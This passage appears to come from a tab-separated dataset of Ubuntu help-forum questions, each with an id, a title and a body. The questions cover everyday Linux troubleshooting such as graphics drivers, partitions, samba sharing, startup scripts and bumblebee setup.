the problem . i 'm using zsh but bash behaves the same way . % reset did not work either . login works normally , so typing in a user name and password is working . just the output is weird . the boot prompt with all status information is scrambled like this as well . thanks for any tips . flowolf
228301	what are the implications of two drives being extended in gparted ?	the above is the configuration of my partitioning system in gparted . windows is on sda1 . ubuntu is on sda6 . i want to use unetbootin to install another linux on sda5 . my question is : why are sda5 and sda6 both included under the `` extended '' rubric ? i probably did something i did n't understand when installing . is this a problem , or can i just clear out sda5 and install as usual ?
228303	installing applications in a pc with no direct internet connection	linux gurus : how do i download the 'restricted extras ' package from a windows pc ? . my ubuntu pc is at home with no internet connection . i have searched all over the downloads section on this site and i still do n't find a link for downloading this package as a standalone . please help or advice . to clarify my point : i am a newbee on linux world . i just downloaded the ubuntu 12.04 lts and installed on a old pc . now i want to enjoy my linux machine by playing some mp3 files but i ca n't ? ? ? ? how in the world this easy thing is made a little obscure in this side of the world ? my kid and i were pretty happy to start experimening with linux but now ... . : ( (
228304	how do i run a script at start up ?	i know that this is probably pretty easy to do , but i 'm not a linux person ( i 'm trying to learn more ) . i have a script in a folder : /path/to/my/script.sh i need this script to run every time the system starts ( even if no one logs in to the system ) . what do i need to do in order to make this happen ? thanks for your help !
228309	firefox `` clone '' for ubuntu	in windows i use , beside the main firefox installation , one or even two `` firefox clones '' for different purposes ( specifically oriented addons and configurations , light configuration without addons , configuration for a different user , etc ) . for example , in windows , pale moon , cometbird and wyzo are ff clones ( but they do not have linux support ) . basically , flock browser would also qualify , and it had support for linux : but it was discontinued . a `` firefox clone '' is a term that i adopted from the use in windows , the meaning of which includes these two elements : ( 1 ) . is a browser that is identical ( based on mozilla firefox ) or very similar and has large/full support for ff extensions , configuration , profiles . = can use ff extensions etc . ( 2 ) . runs independently from firefox , can be opened at the same time with firefox = does not share ff extensions etc . ] ( that is , a ff clone would be to firefox what google chrome and srware iron are to chromium - almost identical , but able to run separately in parallel . ) [ seamonkey , has support for linux , but ( although it can use a lot of ff extensions ) : themes are not working , the interface is in general different and rather primitive . it has the merit of keeping the pace with ff 4+ ( in contrast with swiftweasel , for example . ) ] are there such more browsers available in ubuntu ? ( as for comments asking why i `` really '' need these `` clones '' , i am just used to doing that , i like two separate firefox-like browsers : is n't pleasure , just like curiosity , a good reason for an action ? ) edit after using multiple accounts : after testing for a while this solution that has prevailed here ( was most up-voted ) of using multiple accounts i have to say that it may involve certain problems in cases where other separate customizations/advanced uses are implemented . ( for example , using scripts to search internet for selected text may open new unwanted profiles instead of the default one ; or using firefox `` openwith '' addon to try and open a link with a new ff profile would give a report that the profile is not accessible . ) a complete separate browser for a parallel use may be in such cases more useful . ( in this respect , seamonkey deserves to be taken into account. ) edit considering the definitive answer : although answers proposing the use of multiple accounts were most voted , i will prefer an answer that proposes a separate browser , for two reasons : 1. that is what the question asks for in the first place , and 2. multiple accounts may involve some problems , like those mentioned above .
228312	how to emulate pressing the close button from a script ?	i wanted thunderbird to stay in the background to notify me of incoming mails . after a bit of searching , i found this post . how to keep thunderbird and pidgin running on background ? the solution is to install an addon so that when we close thunderbird it just stays in the background . now , to have thunderbird running at start up we can just add it to startup applications . but , when i open my system , thunderbird also gets opened and i have to manually press the close button everytime to make thunderbird go into the background . the solution given in the above post for this problem is to select minimize on start . but doing so affects the way in which thunderbird works when invoked from the messaging menu . so i deselected this option . but , if there is a way to emulate pressing the close button from a script , i can just add that script to startup applications so is there a way to achieve this ? note : if there is a simpler way to solve my original problem of keeping thunderbird in background please post that also . many thanks .
228315	split zip file and join them in windows	i searched before posting the question , but could n't find anything related . all i need is some help in splitting a zip file in ubuntu as .z01 , .z02 etc ... so that i would join them in windows back . edit : i realized that i do n't have access to command prompt in windows . how would i unzip files now ?
228323	is there a way to order applications in the launcher by frequency of use ?	is there a way to order buttons in launcher by frequency of use ? have around 40 items and small screen size to view all of them . did a search on software center , search engines but nothing about it .
228324	nvidia graphic drivers slowing system	i installed ubuntu 12.10 first , and tried for 2 days ... . everything looks great and problem started after i installed graphic drivers . i installed `` additional drivers '' software from software manager , and installed recommended drivers from there . after that it started slowing down my system frequently . it works fine for some time when i restart , i dont know why and when it starts again but it makes very slow like i have to wait 2 min to open my firefox browser completely . i formatted my system ( only linux ) then installed 12.04 . i am getting same problem here also after installing graphic card drivers . my system config : 2gb ram , core2duo processor 2.80ghz , 500gb , nvidia ge force 9600gt ( 512mb ) graphic card . i am using dual boot mode with windows8 what could be the problem ? thanks
228326	i have two versions of glib on my system , and i do n't know how to remove the old one	while trying to compile a program ( pygobject ) , running ./configure i am told that i do n't have glib . so , i download the tarball and compile and install , no problems . now when i try to ./configure the package again , i get the following error : checking for glib - version > = 2.24.0 ... *** 'pkg-config -- modversion glib-2.0 ' returned 2.34.2 , but glib ( 2.34.0 ) *** was found ! if pkg-config was correct , then it is best *** to remove the old version of glib . you may also be able to fix the error *** by modifying your ld_library_path enviroment variable , or by editing *** /etc/ld.so.conf . make sure you have run ldconfig if that is *** required on your system . *** if pkg-config was wrong , set the environment variable pkg_config_path *** to point to the correct configuration files no configure : error : maybe you want the pygobject-2-4 branch ? here is the entire prompt : http : //pastebin.com/raw.php ? i=gs6mrtwh
228327	symfony2 - apache vhost for app_dev different port	as i 'm using url rewriting to access my symfony2 application , it is directly available from http : //my_application.my_domain.net now i 'd like to be able to access the dev environment simply using a different port like : http : //my_application.my_domain.net:8081
228330	unsaved settings	just had ubuntu 12.04 installed on my pc , the only problem i am discovering is that none of my settings are saving . appearance-behavior resets to default every time i reboot . my thunderbird accounts are deleted and none of my bookmarks are being saved in mozilla . any way to fix this ?
228331	how to install window xp from ubuntu	how to install window xp from ubuntu ? is there is any way to install window xp from ubuntu my cd room is dead and my pc is old ca n't boot from usb
228337	is there a `` .d '' directory to use to load modules at boot time , opposed to /etc/modules ?	i am automating some configurations on my systems using puppet ( however , that is not really relevant here ) . for a group of machines i want to load a kernel module at boot time . the most elegant way seems to edit /etc/modules and add one on an individual line . however , i would like to use separate files in a `` .d '' directory structure for easier maintainability , rather than having puppet editing a file . for modprobe and specifying the options for or blacklisting modules , there 's /etc/modprobe.d/ , but what 's the most elegant way for actually loading modules at boot time using a single new file ? basically , i 'm looking for the non-existing /etc/modules.d/ directory . any suggestions ?
228340	conn to internet via lan pppoe	i installed ubuntu 12.10 today along with windows . on windows i am connected to lan ( my internet comes through a ethernet cable ) . i have a pppoe connection with a username and password through which i connect to the internet . i want to do the same on ubuntu . how to make the connection in ubuntu ? ( i know how do it on windows )
228341	preventing users/groups from accessing certain domains	i have created a study account which i use when doing anything school related work . it 's purpose is to remove the distractions of my normal account , such as social media and news websites . i know /etc/hosts can be edited to block certain domains from being accessed , but this is for all users , and i do n't want to have to switch in and out of admin to change it every time i want to focus . is there any way to block these domains for specific users or groups ?
228343	what does this rule mean	when i run sudo iptables -l , i get : chain input ( policy accept ) target prot opt source destination reject tcp -- anywhere anywhere tcp dpt : www flags : fin , syn , rst , ack/syn # conn/32 > 20 reject-with tcp-reset chain forward ( policy accept ) target prot opt source destination chain output ( policy accept ) target prot opt source destination what does this mean ? i am pretty new to the whole ubuntu world . i can not access webmin at times , keep getting the connection has timed out error .
228351	wifi browser login problem	we use a wifi network at my school in which you must login with your student account in the web brower . when i boot my laptop with windows 7 , it redirects me automatically to the login page . but if i use ubuntu 12.10 i can connect to the wifi network , but it does n't show the login page . i tried with chrome and firefox , but both browsers wo n't show any page . is there a solution to this problem ?
228353	major opcode of failed request : 141 ( randr ) when trying to add a mode with xrandr	i just bought a matrox triplehead2go digital edition ( t2g-d3d-if ) to drive my three widescreen monitors because the regular fglrx drivers were very sluggish when doing it directly from the video card ( radeon 6700 ) . i installed the triplehead2go and everything works fine , but the ati drivers see 3840x1024 as the max resolution : screen 0 : minimum 320 x 200 , current 3840 x 1024 , maximum 3840 x 3840 dfp1 disconnected ( normal left inverted right x axis y axis ) dfp2 disconnected ( normal left inverted right x axis y axis ) dfp3 disconnected ( normal left inverted right x axis y axis ) dfp4 connected 3840x1024+0+0 ( normal left inverted right x axis y axis ) 2352mm x 806mm 3840x1024 60.0*+ 3072x768 60.0 1600x1200 60.0 1400x1050 60.0 2400x600 60.3 1280x1024 75.0 60.0 1440x900 60.0 1280x960 75.0 60.0 1280x768 75.0 60.0 1280x720 75.0 60.0 1920x480 59.9 1024x768 75.0 60.0 800x600 75.0 60.3 640x480 75.0 59.9 crt1 disconnected ( normal left inverted right x axis y axis ) reading this ( https : //wiki.ubuntu.com/x/config/resolution ) i found you could add modes with xrandr , so i did : $ cvt 5760 1080 60 # 5760x1080 59.99 hz ( cvt ) hsync : 67.19 khz ; pclk : 519.25 mhz modeline `` 5760x1080_60.00 '' 519.25 5760 6128 6744 7728 1080 1083 1093 1120 -hsync +vsync $ xrandr -- newmode `` 5760x1080_60.00 '' 519.25 5760 6128 6744 7728 1080 1083 1093 1120 -hsync +vsync this seems to work well . ' $ xrandr screen 0 : minimum 320 x 200 , current 3840 x 1024 , maximum 3840 x 3840 dfp1 disconnected ( normal left inverted right x axis y axis ) dfp2 disconnected ( normal left inverted right x axis y axis ) dfp3 disconnected ( normal left inverted right x axis y axis ) dfp4 connected 3840x1024+0+0 ( normal left inverted right x axis y axis ) 2352mm x 806mm 3840x1024 60.0*+ 3072x768 60.0 1600x1200 60.0 1400x1050 60.0 2400x600 60.3 1280x1024 75.0 60.0 1440x900 60.0 1280x960 75.0 60.0 1280x768 75.0 60.0 1280x720 75.0 60.0 1920x480 59.9 1024x768 75.0 60.0 800x600 75.0 60.3 640x480 75.0 59.9 crt1 disconnected ( normal left inverted right x axis y axis ) 5760x1080_60.00 ( 0xdb ) 519.2mhz h : width 5760 start 6128 end 6744 total 7728 skew 0 clock 67.2khz v : height 1080 start 1083 end 1093 total 1120 clock 60.0hzw it 's now there , but it 's not connected . so i tried connecting it to dfp4 . this is where i hit a brick wall : $ xrandr -- addmode dfp4 `` 5760x1080_60.00 '' x error of failed request : badmatch ( invalid parameter attributes ) major opcode of failed request : 141 ( randr ) minor opcode of failed request : 18 ( rraddoutputmode ) serial number of failed request : 43 current serial number in output stream : 44 i verified that the product specs do support 5760x1080 . what could be going wrong here ? have i added the mode incorrectly ? thanks very much for any help you can offer . update : i tried this after reading another thread : $ xrandr -- fb 5760x1080 xrandr : screen can not be larger than 3840x3840 ( desired size 5760x1080 )
228354	size of icons on ubuntu 12.04 with gnome 3	i have never had any difficulties changing size of icons . now the main trouble is that change of -shell-grid-item-size does not take effect . i was sure that -shell-grid-item-size defined the size of container ( an icon and its paddings ) . but whatever value i install noting changes . .icon-grid { spacing : 25px ; -shell-grid-item-size : 50px ; } .all-app .overview-icon { -shell-grid-item-size : 100px ; } i tried the accepted solution from how to reduce the size of all gnome-shell icons ? and did n't succeed . the solution i might have forgotten to restart gnome . alt + f2 , type r , and press enter
228357	how to install pycrypto 2.6 in python 3.2 in ubuntu	how do i find and install pycrypto 2.6 to python 3.2 in ubuntu 12.04 , i have looked everywhere for a package , i managed to get it installed on python 2.7 just fine , but i want be able to use the lib in 3.2 . program in both and want to be able to use it in both , thank you . im running : ubuntu 12.04 , acer aspire 5920 , 3 gb ram
228359	evolution mail and calendar icon not going away	i installed evolution mail and calendar from the software center . i did n't like it and so i uninstalled . but the icon is not going from the dash menu . software center : http : //flic.kr/p/dauim6 dash : http : //flic.kr/p/dazls1 thanks !
228361	network notify-send over two ubu machines	i 'm looking for a way of using something like notify-send over my local network . i know i can use netstat for network chat but is there someway to use the dbus type messages that gnome pops up over a network ? i have 3 computers running at all times in my network working on things , i would like for my scripts to be able to notify me when done on my main work pc . edit : ok the link below is fine , and the script was working that the user posted : # ! /bin/bash port=3333 nc -l $ port | while read msg ; do notify-send alert `` $ msg '' ; done but for some reason it wo n't stay open , it runs for the first message then turns off the script . i need the script to stay open all the time until i close it . what can i do to fix this ?
228365	ubuntu 12.10 on ati radeon x1300/1550	will ubuntu will work without any problem on ati radeon x1300/1550 ? are there drivers for it ? where do i get them ?
228370	redirecting the date and time to a file when eth0 starts up	i am trying to write a script that redirects the date and time when eth0 comes up . here 's the line with problem up date '+uptd % d- % m- % y/ % h : % m ' > > /home/abpit/network.log but it does n't write a single thing in the file ! what am i doing wrong ? ubuntu version : 12.04 file has now rwx permission , but still it does n't have a single line in it . also , eth0 is configured automatically .
228372	how do i make a app in quickly and play a sound when a button is clicked in the app ?	is there anyway i can make an application in which a button made in glade can be clicked to play a custom re-definable sound ?
228373	a problem with the wired connection between windows and ubuntu	currently i have installed ubuntu on my windows 7 . the problem comes when i switch from ubuntu to windows and vice versa . my connection suddenly stops working - when i switch from win to ubuntu and from ubuntu to win . however after a few minutes it start working again . anyone had similar problems ? thank you in advance ! keks
228374	overriding default search location for library on ubuntu 12.04.1	to properly compile the mpfr library on my ubuntu 12.04.1 system ( 64-bit ) , i need to update the c_include_path , library_path , ld_library_path and ld_run_path variables . this is mentioned in the faq for building the mpfr library . updating these variables is required since the gmp library is already on the search paths and included as a part of the default ubuntu install . however , i 've installed the gmp library in my /usr/local/lib directory . in my home directory , i 've created a .pam_environment file and placed the following lines : export c_include_path=/usr/local/include : $ c_include_path export library_path=/usr/local/lib : $ library_path export ld_library_path=/usr/local/lib : $ ld_library_path export ld_run_path=/usr/local/lib : $ ld_run_path however , the mpfr library configure script still ca n't find my own version of the gmp library in the /usr/local/lib directory . looking inside of the /etc/ld.so.conf.d directory , the contents of my libc.conf file is : # libc default configuration /usr/local/lib also , the contents of the x86_64-linux-gnu.conf file is : # multiarch support /lib/x86_64-linux-gnu /usr/lib/x86_64-linux-gnu however , running locate libgmp on the command line shows that there is already a version of libgmp that ships with the system . $ locate libgmp /usr/lib/x86_64-linux-gnu/libgmp.so.10 /usr/lib/x86_64-linux-gnu/libgmp.so.10.0.2 /usr/lib/x86_64-linux-gnu/openssl-1.0.0/engines/libgmp.so /usr/share/doc/libgmp10 /usr/share/doc/libgmp10/readme.debian /usr/share/doc/libgmp10/todo.debian /usr/share/doc/libgmp10/changelog.debian.gz /usr/share/doc/libgmp10/copyright /var/lib/dpkg/info/libgmp10 : amd64.list /var/lib/dpkg/info/libgmp10 : amd64.md5sums /var/lib/dpkg/info/libgmp10 : amd64.postinst /var/lib/dpkg/info/libgmp10 : amd64.postrm /var/lib/dpkg/info/libgmp10 : amd64.shlibs questions : how do i override the location of the libgmp version used during linking ? i would like to use the library in the \usr\local\lib directory . do i place the c_include_path and other variables in my .pam_environment file , or is there a more appropriate location ?
228377	hybrid-dump for vdpau accelerated video playing on xubuntu 12.04	following the instructions posted in hybrid-dump for vdpau accelerated video playing on ubuntu 11.10 with bumblebee 3.0 ? watching videos with hardware acceleration enabled gives me sound but no image i have managed to successfully compile and run hybrid-windump both from gebart and harp1n . i am using bumblebee 3.0.1 with x-swat drivers 304.64 under xubuntu 12.04 with nvidia gt 525m . running ld_library_path= $ ld_library_path : /usr/lib/nvidia-current/vdpau : /usr/lib/nvidia_current display=:8 optirun mplayer -vo vdpau videofilename in another window display=:8 metacity -- replace and in yet another window ./windump :8 :0.0 regardless if i compile either of the windump sources with or without included xorg.conf ( using respectively gcc and make ) the result is always the same . the displayed windump screen is entirely black . mplayer reports the following mplayer svn r34540 ( ubuntu ) , built with gcc-4.6 ( c ) 2000-2012 mplayer team mplayer : could not connect to socket mplayer : no such file or directory failed to open lirc support . you will not be able to use your remote control . playing [ f2715aee ] .mkv . libavformat version 53.21.0 ( external ) mismatching header version 53.19.0 libavformat file format detected . [ matroska , webm @ 0x7f573df99940 ] max_analyze_duration reached [ matroska , webm @ 0x7f573df99940 ] estimating duration from bitrate , this may be inaccurate [ lavf ] stream 0 : video ( h264 ) , -vid 0 [ lavf ] stream 1 : audio ( ac3 ) , -aid 0 , -alang jpn [ lavf ] stream 2 : subtitle ( ass ) , -sid 0 , -slang eng , gg video : [ h264 ] 704x480 0bpp 23.976 fps 0.0 kbps ( 0.0 kbyte/s ) clip info : title : 01 load subtitles in ./ sub : added subtitle file ( 1 ) : ./ [ f2715aee ] .ass ========================================================================== opening video decoder : [ ffmpeg ] ffmpeg 's libavcodec codec family libavcodec version 53.35.0 ( external ) mismatching header version 53.32.2 selected video codec : [ ffh264 ] vfm : ffmpeg ( ffmpeg h.264 ) ========================================================================== ========================================================================== opening audio decoder : [ ffmpeg ] ffmpeg/libavcodec audio decoders audio : 48000 hz , 2 ch , s16le , 448.0 kbit/29.17 % ( ratio : 56000- > 192000 ) selected audio codec : [ ffac3 ] afm : ffmpeg ( ffmpeg ac-3 ) ========================================================================== ao : [ pulse ] 48000hz 2ch s16le ( 2 bytes per sample ) starting playback ... unsupported pixelformat 61 unsupported pixelformat 53 unsupported pixelformat 81 movie-aspect is 1.74:1 - prescaling to correct movie aspect . vo : [ vdpau ] 704x480 = > 834x480 planar yv12 a : 22.0 v : 22.0 a-v : 0.000 ct : 0.042 0/ 0 11 % 1 % 0.6 % 0 0 i get the following image http : //i.imgur.com/nnfmi.png there seems to be a window inside of that area , although i am unable to move , resize or close it . the same happens when running glxspheres , but the invisible window has different size and takes up the whole black area . can anyone help me out with getting the image display correctly ?
228382	how do i disable the sleep button on my keyboard in u12.04 ?	hello i have read q and a : how do i disable the sleep button on my keyboard ? but in ubuntu 12.04 64bit has gsettings set org.gnome.settings-daemon.plugins.power button-sleep `` nothing '' gsettings set org.gnome.settings-daemon.plugins.power button-hibernate `` nothing '' no effect . after pressing sleep button on keyboard , pc goes immediately to sleep ( str suspend to ram ) . log out- > in does n't help . any ideas ?
228385	why is ubuntu 's redis package so old ?	the latest release is 2.6.7 . 2.4.8 is now considered legacy . anything previous to those versions is considered `` not supported '' by redis developers . why is the ubuntu redis packaging lagging behind the current versions ?
228386	how do you apply performance tuning settings for native zfs ?	i am currently running an ubuntu 12.10 desktop with some zfs pools . i have installed zfs using the following instructions and from the ppa it contains : https : //wiki.ubuntu.com/zfs i have a bursty/fluctuating write performance issue which is apparently a known issue . i have found several posts where people have the exact same problem . constant fluctuating writes . according to the http : //wiki.freebsd.org/zfstuningguide i need to apply some settings to `` avoid the bursty io that 's often seen with zfs . '' this must be done in the /boot/loader.conf . since ubuntu does not use that , as far as i can tell , i have no idea how to apply settings like : vfs.zfs.prefetch_disable= '' 1 '' vfs.zfs.txg.timeout= '' 5 '' kern.maxvnodes=250000 vfs.zfs.write_limit_override=1073741824 vfs.zfs.arc_min= '' 512m '' vfs.zfs.arc_max= '' 1536m '' vm.kmem_size_max= '' 8g '' vm.kmem_size= '' 6g '' which is mentioned in the general tuning section . other sources say use sysctl . but when i do i get this : sudo sysctl vfs.zfs.prefetch_disable= '' 1 '' sysctl : can not stat /proc/sys/vfs/zfs/prefetch_disable : no such file or directory i can not find anything for vfs or zfs in /proc/sys . where does one do this kind of thing in ubuntu ? thanks
228388	fingerprint gui on thinkpad x1 carbon	i have a thinkpad x1 carbon . i followed these instructions , but to no avail . the output of lsusb is : sguha @ ajgubi : ~ $ lsusb bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 003 : id 147e:2020 upek bus 001 device 004 : id 5986:0266 acer , inc
228397	64bit amd catalyst driver	is there a 64 bit amd catalyst driver for 12.10 ? i installed catalyst 12.9 but that borked my graphics and would only allow me to boot into command line mode .
228398	why does my .desktop file execute via double click but not from the menu ?	i 've installed ftl : faster than light on my girlfriend 's lubuntu machine and created a .desktop file for it . strangely , the program wo n't launch via its menu entry under 'games ' . if i navigate to /home/andi/.local/share/applications/ via pcmanfm and double click on ftl faster than light.desktop the game launches without a problem . i know the menu entry is generated through the .desktop file so why wo n't it launch from the menu ? here 's the .desktop file i created : ftl faster than light.desktop
228399	graphic issue on intel945 chipset	i used intrepid ( 8.10 ) and my graphics used to work fine with compiz effects and all ( on better resolution than 1024x768 ) .now i have upgraded to precise ( 12.04 ) but i use gnome classic ( with compiz effects ) as my desktop but the compiz effects seem not to work , only unity 2d works . when i ran lshw -c video it gives : *-display unclaimed description : vga compatible controller product : 82945g/gz integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 02 width : 32 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list configuration : latency=0 resources : memory : fea80000-feafffff ioport : dc00 ( size=8 ) memory : e0000000-efffffff memory : fea40000-fea7ffff sysinfo shows : display resolution 1024x768 pixels opengl renderer gallium 0.4 on llvmpipe ( llvm 0x300 ) x11 vendor the x.org foundation on systemsettings : memory 993.3 mib processor intel速 pentium ( r ) 4 cpu 2.40ghz graphics vesa : intel ( r ) 82945g chipset family graphics os type 32-bit glxgears output comes to be around 100fps which used to be around 900fps in intrepid
228402	boot to runlevel 3	i am running ubuntu server , and just installed the gnome desktop on there ( i neeeded to run an application that would only work in a graphical interface ) . however , now the server boots to the gui every time . i need the server to boot to the command line ( runlevel 3 ) . according to several articles that i 've read , ubuntu does not use the standard runlevels . what file do i need to modify in order to boot to runlevel 3 ( or whatever the ubuntu equivalent is ) ?
228404	ubuntu 12.10 no audio via hdmi on a asus f1a75-v pro amd	i recently installed ubuntu 12.10 on my desktop but theirs no sound through the hdmi cable . i tried to set up the setting that comes with ubuntu but still nothing . this is my motherboard asus f1a75-v pro amd any help would be great or advice . thanks .
228407	i have broken the fstab file and now i ca n't start ubuntu , how can i fix it ?	i changed fstab and now ubuntu ( precise pangolin ) does not start up . the screen goes blank and nothing happens . i have a copy of fstab , but i do n't know how to replace the current version with the backup , since the system does not star . i 've tried using the recovery mode , but when i choose `` root '' to go to the terminal a message specifies that the file system is in read only mode and i ca n't modify any files . i 've also tried mounting it again in read-write mode with : mount -rw -o remount / but when i do this , the terminal does not accept any other command ( for every command i type , i always get the message `` denied permission '' ) . could you please help me fix this mess ?
228416	netflix custom wine usable with other programs ?	i noticed that the wine installed to run the netflix app found here installs a custom wine along with the full mono and possibly .net . i have been having chronic problems getting the program reply media catcher to work on wine 1.4 and 1.5.19 , using both plain wine and playonlinux ; will this version of wine due to it 's tighter integration of .net possibly make using windows programs in general easier to install , or is it too focused to be used as a general wine ?
228417	how to access windows 7 pc in samba network ?	first of all , sorry for my bad english , as it is n't my primary language . i have a home network with my ubuntu box , a windows xp box ( sister 's laptop ) and a windows 7 box ( mother 's pc ) . never had a mixed network ; with some effort i could install samba and see the pcs ( and be seen for them ) . all windows pcs can access ubuntu , create and delete files and folders in the shared folders like a charm , and i can do the same with the windows xp pc . from ubuntu to windows 7 , however , i ca n't ; a window requesting credentials appears , but there 's nothing password-protected accounts in windows 7 . there 's just one user account on that computer , without password . how can i access this computer ?
228419	strugling with samsung np300v5ah and bumblebee on 12.10	i have some problems with optimus on 12.10 . i did a fresh install of ubuntu and then followed the official wiki - https : //wiki.ubuntu.com/bumblebee . installation process went fine . but after restart i ca n't use `` optirun someapp '' . the display goes to command line , i ca n't see any of desktop elements just lots of text . one time it went back and said the default phrase of `` ca n't connect to driver '' or something like that . optirun -status gives me : [ 1231.231171 ] [ error ] the bumblebee daemon has not been started yet or the socket path tatus was incorrect . [ 1231.231297 ] [ error ] could not connect to bumblebee daemon - is it running ? but sudo bubmblebeed says : [ 1365.303793 ] [ error ] daemon already running , pid 1031 my uname -a gives linux plastic-lap 3.5.0-19-generic # 30-ubuntu smp tue nov 13 17:49:53 utc 2012 i686 i686 i686 gnu/linux lspci -nn 00:00.0 host bridge [ 0600 ] : intel corporation 2nd generation core processor family dram controller [ 8086:0104 ] ( rev 09 ) 00:01.0 pci bridge [ 0604 ] : intel corporation xeon e3-1200/2nd generation core processor family pci express root port [ 8086:0101 ] ( rev 09 ) 00:02.0 vga compatible controller [ 0300 ] : intel corporation 2nd generation core processor family integrated graphics controller [ 8086:0116 ] ( rev 09 ) 00:16.0 communication controller [ 0780 ] : intel corporation 6 series/c200 series chipset family mei controller # 1 [ 8086:1c3a ] ( rev 04 ) 00:1a.0 usb controller [ 0c03 ] : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 2 [ 8086:1c2d ] ( rev 04 ) 00:1b.0 audio device [ 0403 ] : intel corporation 6 series/c200 series chipset family high definition audio controller [ 8086:1c20 ] ( rev 04 ) 00:1c.0 pci bridge [ 0604 ] : intel corporation 6 series/c200 series chipset family pci express root port 1 [ 8086:1c10 ] ( rev b4 ) 00:1c.3 pci bridge [ 0604 ] : intel corporation 6 series/c200 series chipset family pci express root port 4 [ 8086:1c16 ] ( rev b4 ) 00:1d.0 usb controller [ 0c03 ] : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 [ 8086:1c26 ] ( rev 04 ) 00:1f.0 isa bridge [ 0601 ] : intel corporation hm65 express chipset family lpc controller [ 8086:1c49 ] ( rev 04 ) 00:1f.2 sata controller [ 0106 ] : intel corporation 6 series/c200 series chipset family 6 port sata ahci controller [ 8086:1c03 ] ( rev 04 ) 00:1f.3 smbus [ 0c05 ] : intel corporation 6 series/c200 series chipset family smbus controller [ 8086:1c22 ] ( rev 04 ) 01:00.0 3d controller [ 0302 ] : nvidia corporation gf119 [ geforce gt 520mx ] [ 10de:1051 ] ( rev ff ) 02:00.0 network controller [ 0280 ] : intel corporation centrino wireless-n 130 [ 8086:0896 ] ( rev 34 ) 03:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 06 ) i could n't figure this problem out . can anybody help me ? and bay the way it looks funny when official step-by-step instructions does not work.. : ) help me i 'm really in need of my nvidia gpu especially when i 'm invited to steam beta ( at last ) . : d update by request : hare is the output of grep bumblebee /var/log/syslog | pastebinit dec 12 17:13:49 plastic-lap bumblebeed [ 1029 ] : x did not start properly dec 12 21:31:59 plastic-lap bumblebeed [ 1023 ] : /usr/sbin/bumblebeed 3.0.1 started dec 12 21:44:14 plastic-lap bumblebeed [ 1023 ] : received terminated signal . dec 12 21:44:14 plastic-lap bumblebeed [ 2777 ] : /usr/sbin/bumblebeed 3.0.1 started dec 12 21:50:39 plastic-lap bumblebeed [ 1011 ] : /usr/sbin/bumblebeed 3.0.1 started dec 12 21:52:07 plastic-lap bumblebeed [ 986 ] : /usr/sbin/bumblebeed 3.0.1 started dec 12 21:54:27 plastic-lap bumblebeed [ 986 ] : received terminated signal . dec 12 21:54:27 plastic-lap bumblebeed [ 2461 ] : /usr/sbin/bumblebeed 3.0.1 started dec 12 21:58:43 plastic-lap bumblebeed [ 2461 ] : received terminated signal . dec 12 22:06:40 plastic-lap bumblebeed [ 4357 ] : /usr/sbin/bumblebeed 3.0.1 started dec 12 22:07:17 plastic-lap bumblebeed [ 4357 ] : received terminated signal . dec 12 22:07:18 plastic-lap bumblebeed [ 4357 ] : the pci config space could not be written fully at offset 0x1 ; 0 bytes have been written ; error : interrupted system call dec 12 22:07:18 plastic-lap bumblebeed [ 5876 ] : /usr/sbin/bumblebeed 3.0.1 started dec 12 22:08:44 plastic-lap bumblebeed [ 1031 ] : /usr/sbin/bumblebeed 3.0.1 started dec 12 22:51:05 plastic-lap bumblebeed [ 923 ] : /usr/sbin/bumblebeed 3.0.1 started dec 12 22:51:46 plastic-lap bumblebeed [ 923 ] : x did not start properly dec 12 22:53:17 plastic-lap bumblebeed [ 1043 ] : /usr/sbin/bumblebeed 3.0.1 started anything else needed ? ok one of the problems may be related to this : cat /proc/acpi/bbswitch 0000:01:00.0 off strange is that that i have linux headers and bbswitch installed.. i did what salem suggested , but still no luck.. this is what optirun prints : optirun -vv glxspheres [ 34.815833 ] [ debug ] reading file : /etc/bumblebee/bumblebee.conf [ 34.816114 ] [ info ] configured driver : nvidia [ 34.954179 ] [ debug ] optirun version 3.0.1 starting ... [ 34.954208 ] [ debug ] active configuration : [ 34.954212 ] [ debug ] bumblebeed config file : /etc/bumblebee/bumblebee.conf [ 34.954216 ] [ debug ] x display : :8 [ 34.954220 ] [ debug ] ld_library_path : /usr/lib/nvidia-current : /usr/lib32/nvidia-current [ 34.954224 ] [ debug ] socket path : /var/run/bumblebee.socket [ 34.954227 ] [ debug ] vgl compression : proxy [ 36.807365 ] [ info ] response : no - error : x did not start properly [ 36.807387 ] [ error ] can not access secondary gpu - error : x did not start properly [ 36.807393 ] [ debug ] socket closed . [ 36.807415 ] [ error ] aborting because fallback start is disabled . [ 36.807420 ] [ debug ] killing all remaining processes . this is my /etc/bumblebee/bumblebee.conf # configuration file for bumblebee . values should **not** be put between quotes # # server options . any change made in this section will need a server restart # to take effect . [ bumblebeed ] # the secondary xorg server display number virtualdisplay=:8 # should the unused xorg server be kept running ? set this to true if waiting # for x to be ready is too long and do n't need power management at all . keepunusedxserver=false # the name of the bumbleblee server group name ( gid name ) servergroup=bumblebee # card power state at exit . set to false if the card shoud be on when bumblebee # server exits . turncardoffatexit=true # the default behavior of '-f ' option on optirun . if set to `` true '' , '-f ' will # be ignored . noecomodeoverride=false # the driver used by bumblebee server . if this value is not set ( or empty ) , # auto-detection is performed . the available drivers are nvidia and nouveau # ( see also the driver-specific sections below ) driver=nvidia # # client options . will take effect on the next optirun executed . [ optirun ] # the method used for virtualgl to transport frames between x servers . # possible values are proxy , jpeg , rgb , xv and yuv . vgltransport=proxy # should the program run under optirun even if bumblebee server or nvidia card # is not available ? allowfallbacktoigc=false # driver-specific settings are grouped under [ driver-name ] . the sections are # parsed if the driver setting in [ bumblebeed ] is set to name ( or if auto- # detection resolves to name ) . # pmmethod : method to use for saving power by disabling the nvidia card , valid # values are : auto - automatically detect which pm method to use # bbswitch - new in bb 3 , recommended if available # switcheroo - vga_switcheroo method , use at your own risk # none - disable pm completely # https 